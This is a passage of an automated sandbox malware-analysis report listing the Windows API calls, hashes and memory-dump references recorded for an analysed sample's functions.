                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 370933007bf4bf234b0e277910171bcb6c09e7e6e65d843a83f9848a34d0b6f4
                                                                                                                                                                                                                                                                                            • Instruction ID: 139fc1fe30df8ac68c9405f024ef148bf6090db3c36b7c2693fee88793f8a66d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 370933007bf4bf234b0e277910171bcb6c09e7e6e65d843a83f9848a34d0b6f4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4718974604204EFEF219F64CA85FFBBBADEF4D320F14045AE845A7261DB31A980DB11
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 0098B8C0
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0098B8D5
                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 0098B936
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 0098B964
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0098B983
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 0098B9C4
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0098B9E7
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f821e45eaa678095991c43db338544394fbe9a6404397f048c2af59d4fbee7d7
                                                                                                                                                                                                                                                                                            • Instruction ID: c3ff930c732d8c2ee5da410d5066f859fb60125d921a96715f7bab35e9ea918f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f821e45eaa678095991c43db338544394fbe9a6404397f048c2af59d4fbee7d7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1951FFA06087D53EFB3662348C55BBABEAD5B06308F0C8489E1D9469D2D3E9ECC4D750
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetParent.USER32(00000000), ref: 0098B6E0
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0098B6F5
                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 0098B756
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0098B782
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0098B79F
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0098B7DE
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0098B7FF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 269e3b2404e059482c80444cec4e1b417f59f54dece17e3f0228e28e1d6853c7
                                                                                                                                                                                                                                                                                            • Instruction ID: 87b00c53895b1f422064eb88fbfb8302cbb47ee8f3ceae310086b31cab7dedaf
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 269e3b2404e059482c80444cec4e1b417f59f54dece17e3f0228e28e1d6853c7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 035127A09487D53EFB32A334CC55B7ABEAC6F45304F0C8589E1D54AAD2D394EC84E750
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00955F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 009557E3
                                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 0095585E
                                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 00955879
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0095589F
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,00955F16,00000000,?,?,?,?,?,?,?,?,?,00955F16,?), ref: 009558BE
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,00955F16,00000000,?,?,?,?,?,?,?,?,?,00955F16,?), ref: 009558F7
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 11e95c5d71fd9441039755f1d26e4e8a2add7f085fa44f47381213eb6408519e
                                                                                                                                                                                                                                                                                            • Instruction ID: 65ff29227f7348d9b9f82a403725cdb3feacab57f4ccd11f039a317bce7e332b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11e95c5d71fd9441039755f1d26e4e8a2add7f085fa44f47381213eb6408519e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2551BE70A14649DFCB10CFA9D8A1AEEBBB8FF08321F15411AE951E7292E7309945CB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 009430BB
                                                                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 009430C3
                                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00943151
                                                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0094317C
                                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 009431D1
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                            • Opcode ID: 8d5fa20216cf47090e8cea2b56fd9b322f5d9259815760a4804b3b79cc00018d
                                                                                                                                                                                                                                                                                            • Instruction ID: 5d00025cbf00f4a44c5e6337c4e470eac40645517cc0fae68b0301ef09e9c951
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d5fa20216cf47090e8cea2b56fd9b322f5d9259815760a4804b3b79cc00018d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F418034E04218ABCF10DF78C885EAEBBB9AF89325F14C155E915AB392D731DB05CB91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 009A3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 009A3AD7
                                                                                                                                                                                                                                                                                              • Part of subcall function 009A3AAB: _wcslen.LIBCMT ref: 009A3AF8
                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009A1B6F
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 009A1B7E
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 009A1C26
                                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 009A1C56
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 7d861aba7c9ef6adf5cae5ea3cd73fd12380ee4a16fc2fef4d76878df5f6b645
                                                                                                                                                                                                                                                                                            • Instruction ID: 07571d7b686a966446e46372b185118a00fc682e57f05d96dfa8ef1658decd41
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d861aba7c9ef6adf5cae5ea3cd73fd12380ee4a16fc2fef4d76878df5f6b645
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC411571600114AFDB109F64C984BAABBEDEF86324F148159F8499B296DB74ED81CBE0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0098D7CD,?), ref: 0098E714
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0098D7CD,?), ref: 0098E72D
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0098D7F0
                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0098D82A
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0098D8B0
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0098D8C6
                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?), ref: 0098D90C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                            • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                            • Opcode ID: 876e4984a5b71cb90b8cd7c88ace5f6050511ae36ca5649a0495f8ee003dca57
                                                                                                                                                                                                                                                                                            • Instruction ID: 9b4d43c7cb9bd6d6d395e769a55e8ce8161db905356555d9deb529a46167f2a5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 876e4984a5b71cb90b8cd7c88ace5f6050511ae36ca5649a0495f8ee003dca57
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA4137719062189EDF16FFA4D985FDD77BCAF44340F1004E6E545E7281EA35A788CB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 009B38B8
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 009B38EB
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 009B3920
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 009B3952
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 009B397C
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 009B398D
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009B39A7
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f07e378f3eb84d3f272cc7294279c777e387ab2ef5094ceb9e91c71d459261d0
                                                                                                                                                                                                                                                                                            • Instruction ID: 9c8d088b4c1b7d538015473839f2ae48e7c4a50e2ee24ad158e5852fb1699fc8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f07e378f3eb84d3f272cc7294279c777e387ab2ef5094ceb9e91c71d459261d0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65311534619255EFDB21CF58DE85FA837E5FB8A720F1542A4F5108B2B1CBB1A984EB01
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009880D0
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009880F6
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 009880F9
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00988117
                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00988120
                                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00988145
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00988153
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 023fae40b873a09940636fa9cf5d34a11c0973288800bea74a992f422d7ee643
                                                                                                                                                                                                                                                                                            • Instruction ID: d77a9813e4ab816e4bf3fcc9f070f3c2883299aede5f08c18dbc72ba053ff05f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 023fae40b873a09940636fa9cf5d34a11c0973288800bea74a992f422d7ee643
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E219772609219AF9F10EFA8CC88DBB73ACEB093647448525F905DB390DE74DD468770
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009881A9
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009881CF
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 009881D2
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32 ref: 009881F3
                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32 ref: 009881FC
                                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00988216
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00988224
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 54f8b2ce59e12c3d5457d73a548e76e087189cab98ef7e7dc4e20df4fa8e3f46
                                                                                                                                                                                                                                                                                            • Instruction ID: 7bc3c5166df372704f9f4a3c18449ad07c9776b4f3230a56f58cada380897738
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54f8b2ce59e12c3d5457d73a548e76e087189cab98ef7e7dc4e20df4fa8e3f46
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF217171609204BF9B10ABA8DC89DAB77ECEB493607448125F915CB2A0EF74EC41DB74
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00990E99
                                                                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00990ED5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                            • Opcode ID: 2f53d6a0118a00d978cd0f4b2615386fb55df7c7b1a10c20935beceedf7536d9
                                                                                                                                                                                                                                                                                            • Instruction ID: aeb0b7d363a1993f109c50c690408f99113351f113dfc348e88b97f5b576c58b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f53d6a0118a00d978cd0f4b2615386fb55df7c7b1a10c20935beceedf7536d9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D021607150430AAFDF208F6DDC08A9A7BA8BF94764F204A69FCB5E72D0E7709940DB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00990F6D
                                                                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00990FA8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                            • Opcode ID: 8c330ac2b2e483f5d987575f97417a861b55dcf174af91b9177082ef6b5cb0bc
                                                                                                                                                                                                                                                                                            • Instruction ID: 9d9ed48256adc19af4c48a60fe343e03a2b827281263b925d55779d6e65d3a6d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c330ac2b2e483f5d987575f97417a861b55dcf174af91b9177082ef6b5cb0bc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3214A71604346AFDF249F6C8D05A9AB7A8BF96734F200B19F8B1E32D0E7719980DB50
                                                                                                                                                                                                                                                                                            APIs
